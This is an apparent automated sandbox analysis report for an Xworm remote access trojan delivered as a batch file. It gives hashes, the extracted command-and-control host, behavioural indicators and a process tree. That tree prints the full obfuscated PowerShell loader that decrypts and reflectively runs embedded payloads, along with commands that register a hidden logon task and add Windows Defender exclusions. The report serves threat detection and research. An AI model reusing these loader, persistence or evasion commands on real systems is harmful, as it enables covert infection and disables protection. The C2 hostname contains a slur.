xworm | 2bc671246bf742ed639bb5fafa2fcfae1f821500d21971c7a368eba3478b62a0

Analysis

max time kernel
347s
max time network
349s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24-01-2025 14:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WizCldient.bat
Size

262KB
MD5

1298934b3f4c37d349794f0686c6e7a8
SHA1

9a6848b79ba8aba796514526898b4c9217301bc0
SHA256

2bc671246bf742ed639bb5fafa2fcfae1f821500d21971c7a368eba3478b62a0
SHA512

ee7afbdd2cc0297cd0da983618fa45e7c0304c142723f394a8a3d484d6f87e36a902f6dc4788007cd8df5252a455d697eeb21eb1673f41f9464a3d1872179374
SSDEEP

6144:lyFq/jSEnae2y5lSdU0NeUmerUzCO6jZFwkjAZ9:lyFqbSOaeUxeCOibw+AZ9

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

IDKTOBEHONESTNIGAS-56344.portmap.io:56344

Mutex

RRwG35fodUbwRp96

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/3160-51-0x000001622EE30000-0x000001622EE40000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 64 IoCs

flow	pid	Process
17	3160	powershell.exe
22	3160	powershell.exe
23	3160	powershell.exe
28	3160	powershell.exe
30	3160	powershell.exe
32	3160	powershell.exe
35	3160	powershell.exe
37	3160	powershell.exe
38	3160	powershell.exe
39	3160	powershell.exe
42	3160	powershell.exe
53	3160	powershell.exe
54	3160	powershell.exe
56	3160	powershell.exe
57	3160	powershell.exe
62	3160	powershell.exe
63	3160	powershell.exe
64	3160	powershell.exe
65	3160	powershell.exe
66	3160	powershell.exe
67	3160	powershell.exe
68	3160	powershell.exe
69	3160	powershell.exe
70	3160	powershell.exe
71	3160	powershell.exe
72	3160	powershell.exe
73	3160	powershell.exe
74	3160	powershell.exe
75	3160	powershell.exe
76	3160	powershell.exe
77	3160	powershell.exe
78	3160	powershell.exe
79	3160	powershell.exe
80	3160	powershell.exe
81	3160	powershell.exe
83	3160	powershell.exe
84	3160	powershell.exe
85	3160	powershell.exe
88	3160	powershell.exe
89	3160	powershell.exe
90	3160	powershell.exe
91	3160	powershell.exe
92	3160	powershell.exe
93	3160	powershell.exe
94	3160	powershell.exe
95	3160	powershell.exe
96	3160	powershell.exe
97	3160	powershell.exe
98	3160	powershell.exe
99	3160	powershell.exe
100	3160	powershell.exe
101	3160	powershell.exe
102	3160	powershell.exe
103	3160	powershell.exe
104	3160	powershell.exe
105	3160	powershell.exe
106	3160	powershell.exe
107	3160	powershell.exe
108	3160	powershell.exe
109	3160	powershell.exe
110	3160	powershell.exe
111	3160	powershell.exe
112	3160	powershell.exe
113	3160	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2100	powershell.exe
4144	powershell.exe
3160	powershell.exe
3472	powershell.exe
1312	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	powershell.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	powershell.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "162"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2100	powershell.exe
2100	powershell.exe
4144	powershell.exe
4144	powershell.exe
3160	powershell.exe
3160	powershell.exe
3472	powershell.exe
3472	powershell.exe
1312	powershell.exe
1312	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeIncreaseQuotaPrivilege	4144	powershell.exe
Token: SeSecurityPrivilege	4144	powershell.exe
Token: SeTakeOwnershipPrivilege	4144	powershell.exe
Token: SeLoadDriverPrivilege	4144	powershell.exe
Token: SeSystemProfilePrivilege	4144	powershell.exe
Token: SeSystemtimePrivilege	4144	powershell.exe
Token: SeProfSingleProcessPrivilege	4144	powershell.exe
Token: SeIncBasePriorityPrivilege	4144	powershell.exe
Token: SeCreatePagefilePrivilege	4144	powershell.exe
Token: SeBackupPrivilege	4144	powershell.exe
Token: SeRestorePrivilege	4144	powershell.exe
Token: SeShutdownPrivilege	4144	powershell.exe
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeSystemEnvironmentPrivilege	4144	powershell.exe
Token: SeRemoteShutdownPrivilege	4144	powershell.exe
Token: SeUndockPrivilege	4144	powershell.exe
Token: SeManageVolumePrivilege	4144	powershell.exe
Token: 33	4144	powershell.exe
Token: 34	4144	powershell.exe
Token: 35	4144	powershell.exe
Token: 36	4144	powershell.exe
Token: SeIncreaseQuotaPrivilege	4144	powershell.exe
Token: SeSecurityPrivilege	4144	powershell.exe
Token: SeTakeOwnershipPrivilege	4144	powershell.exe
Token: SeLoadDriverPrivilege	4144	powershell.exe
Token: SeSystemProfilePrivilege	4144	powershell.exe
Token: SeSystemtimePrivilege	4144	powershell.exe
Token: SeProfSingleProcessPrivilege	4144	powershell.exe
Token: SeIncBasePriorityPrivilege	4144	powershell.exe
Token: SeCreatePagefilePrivilege	4144	powershell.exe
Token: SeBackupPrivilege	4144	powershell.exe
Token: SeRestorePrivilege	4144	powershell.exe
Token: SeShutdownPrivilege	4144	powershell.exe
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeSystemEnvironmentPrivilege	4144	powershell.exe
Token: SeRemoteShutdownPrivilege	4144	powershell.exe
Token: SeUndockPrivilege	4144	powershell.exe
Token: SeManageVolumePrivilege	4144	powershell.exe
Token: 33	4144	powershell.exe
Token: 34	4144	powershell.exe
Token: 35	4144	powershell.exe
Token: 36	4144	powershell.exe
Token: SeIncreaseQuotaPrivilege	4144	powershell.exe
Token: SeSecurityPrivilege	4144	powershell.exe
Token: SeTakeOwnershipPrivilege	4144	powershell.exe
Token: SeLoadDriverPrivilege	4144	powershell.exe
Token: SeSystemProfilePrivilege	4144	powershell.exe
Token: SeSystemtimePrivilege	4144	powershell.exe
Token: SeProfSingleProcessPrivilege	4144	powershell.exe
Token: SeIncBasePriorityPrivilege	4144	powershell.exe
Token: SeCreatePagefilePrivilege	4144	powershell.exe
Token: SeBackupPrivilege	4144	powershell.exe
Token: SeRestorePrivilege	4144	powershell.exe
Token: SeShutdownPrivilege	4144	powershell.exe
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeSystemEnvironmentPrivilege	4144	powershell.exe
Token: SeRemoteShutdownPrivilege	4144	powershell.exe
Token: SeUndockPrivilege	4144	powershell.exe
Token: SeManageVolumePrivilege	4144	powershell.exe
Token: 33	4144	powershell.exe
Token: 34	4144	powershell.exe
Token: 35	4144	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3948	LogonUI.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 3088 wrote to memory of 2100	3088	cmd.exe	84
PID 3088 wrote to memory of 2100	3088	cmd.exe	84
PID 2100 wrote to memory of 4144	2100	powershell.exe	85
PID 2100 wrote to memory of 4144	2100	powershell.exe	85
PID 2100 wrote to memory of 3648	2100	powershell.exe	88
PID 2100 wrote to memory of 3648	2100	powershell.exe	88
PID 3648 wrote to memory of 3872	3648	WScript.exe	89
PID 3648 wrote to memory of 3872	3648	WScript.exe	89
PID 3872 wrote to memory of 3160	3872	cmd.exe	92
PID 3872 wrote to memory of 3160	3872	cmd.exe	92
PID 3160 wrote to memory of 3472	3160	powershell.exe	96
PID 3160 wrote to memory of 3472	3160	powershell.exe	96
PID 3160 wrote to memory of 1312	3160	powershell.exe	98
PID 3160 wrote to memory of 1312	3160	powershell.exe	98
PID 3160 wrote to memory of 964	3160	powershell.exe	115
PID 3160 wrote to memory of 964	3160	powershell.exe	115

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WizCldient.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('26XlvjUE5165AqEPeVe5DvD1fwVLlGClxE1+Dt9XjP0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sfNDJdxmVNackDmrxAQ8EQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXSyZ=New-Object System.IO.MemoryStream(,$param_var); $HPfSM=New-Object System.IO.MemoryStream; $VaLYr=New-Object System.IO.Compression.GZipStream($vXSyZ, [IO.Compression.CompressionMode]::Decompress); $VaLYr.CopyTo($HPfSM); $VaLYr.Dispose(); $vXSyZ.Dispose(); $HPfSM.Dispose(); $HPfSM.ToArray();}function execute_function($param_var,$param2_var){ $ZjffX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QLaJM=$ZjffX.EntryPoint; $QLaJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\WizCldient.bat';$jsdwy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\WizCldient.bat').Split([Environment]::NewLine);foreach ($wiEcG in $jsdwy) { if ($wiEcG.StartsWith(':: ')) { $POWxE=$wiEcG.Substring(3); break; }}$payloads_var=[string[]]$POWxE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_817_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_817.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4144
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_817.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3648
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_817.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3872
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('26XlvjUE5165AqEPeVe5DvD1fwVLlGClxE1+Dt9XjP0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sfNDJdxmVNackDmrxAQ8EQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXSyZ=New-Object System.IO.MemoryStream(,$param_var); $HPfSM=New-Object System.IO.MemoryStream; $VaLYr=New-Object System.IO.Compression.GZipStream($vXSyZ, [IO.Compression.CompressionMode]::Decompress); $VaLYr.CopyTo($HPfSM); $VaLYr.Dispose(); $vXSyZ.Dispose(); $HPfSM.Dispose(); $HPfSM.ToArray();}function execute_function($param_var,$param2_var){ $ZjffX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QLaJM=$ZjffX.EntryPoint; $QLaJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_817.bat';$jsdwy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_817.bat').Split([Environment]::NewLine);foreach ($wiEcG in $jsdwy) { if ($wiEcG.StartsWith(':: ')) { $POWxE=$wiEcG.Substring(3); break; }}$payloads_var=[string[]]$POWxE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3160
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3472
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1312
      - C:\Windows\SYSTEM32\shutdown.exe
        
        shutdown.exe /f /s /t 0
        6⤵
        
        PID:964

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38d5055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3948

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
773440cd6eb4e778c7d2115d1f231f75

SHA1
4b600aa41fcd267817961c95b104a0717c40e558

SHA256
64c178f2a2edc319c244fa885951e0425ad172e0c9c18d9773069fa13a44385c

SHA512
af0370eb22d7153b7b71a033f56bc08796a0be9a1aa0f479585e03e099a215114f6ac059cf588999f3be36d91bc38ec64b0695071292db8e324ee7bcd505ee35

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pcllpn1s.ieo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_817.bat

Filesize
262KB

MD5
1298934b3f4c37d349794f0686c6e7a8

SHA1
9a6848b79ba8aba796514526898b4c9217301bc0

SHA256
2bc671246bf742ed639bb5fafa2fcfae1f821500d21971c7a368eba3478b62a0

SHA512
ee7afbdd2cc0297cd0da983618fa45e7c0304c142723f394a8a3d484d6f87e36a902f6dc4788007cd8df5252a455d697eeb21eb1673f41f9464a3d1872179374

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_817.vbs

Filesize
115B

MD5
af3b7323ae40be47582f3d8ccab8120c

SHA1
c1ee2a6f5e92f32df41da9e44fe48ecab9f967fd

SHA256
e2b510081177244136bbdd64ca178db9be492354945121cd2d09dc8729423340

SHA512
4dbc9ba62e28e8615b3302d37a954eeb493b444fa582b4c8dc22426b680c2d2debe8c785e6df630694c549d81d28aa3b08eb8e6cb68df8d17d379879d634aa54

Download Submit
memory/2100-50-0x00007FFE71640000-0x00007FFE72101000-memory.dmp

Filesize
10.8MB

Download
memory/2100-12-0x00007FFE71640000-0x00007FFE72101000-memory.dmp

Filesize
10.8MB

Download
memory/2100-13-0x0000020C6D7A0000-0x0000020C6D7A8000-memory.dmp

Filesize
32KB

Download
memory/2100-14-0x0000020C6FA40000-0x0000020C6FA74000-memory.dmp

Filesize
208KB

Download
memory/2100-6-0x0000020C6D750000-0x0000020C6D772000-memory.dmp

Filesize
136KB

Download
memory/2100-0-0x00007FFE71643000-0x00007FFE71645000-memory.dmp

Filesize
8KB

Download
memory/2100-49-0x00007FFE71640000-0x00007FFE72101000-memory.dmp

Filesize
10.8MB

Download
memory/2100-11-0x00007FFE71640000-0x00007FFE72101000-memory.dmp

Filesize
10.8MB

Download
memory/3160-77-0x000001622F5D0000-0x000001622F606000-memory.dmp

Filesize
216KB

Download
memory/3160-79-0x000001622F630000-0x000001622F6BE000-memory.dmp

Filesize
568KB

Download
memory/3160-51-0x000001622EE30000-0x000001622EE40000-memory.dmp

Filesize
64KB

Download
memory/3160-73-0x000001622F460000-0x000001622F46C000-memory.dmp

Filesize
48KB

Download
memory/3160-74-0x000001622EE50000-0x000001622EE5A000-memory.dmp

Filesize
40KB

Download
memory/3160-75-0x000001622F5C0000-0x000001622F5CC000-memory.dmp

Filesize
48KB

Download
memory/3160-76-0x0000016230320000-0x0000016230848000-memory.dmp

Filesize
5.2MB

Download
memory/3160-78-0x000001622F600000-0x000001622F60A000-memory.dmp

Filesize
40KB

Download
memory/4144-30-0x00007FFE71640000-0x00007FFE72101000-memory.dmp

Filesize
10.8MB

Download
memory/4144-27-0x00007FFE71640000-0x00007FFE72101000-memory.dmp

Filesize
10.8MB

Download
memory/4144-26-0x00007FFE71640000-0x00007FFE72101000-memory.dmp

Filesize
10.8MB

Download
memory/4144-25-0x00007FFE71640000-0x00007FFE72101000-memory.dmp

Filesize
10.8MB

Download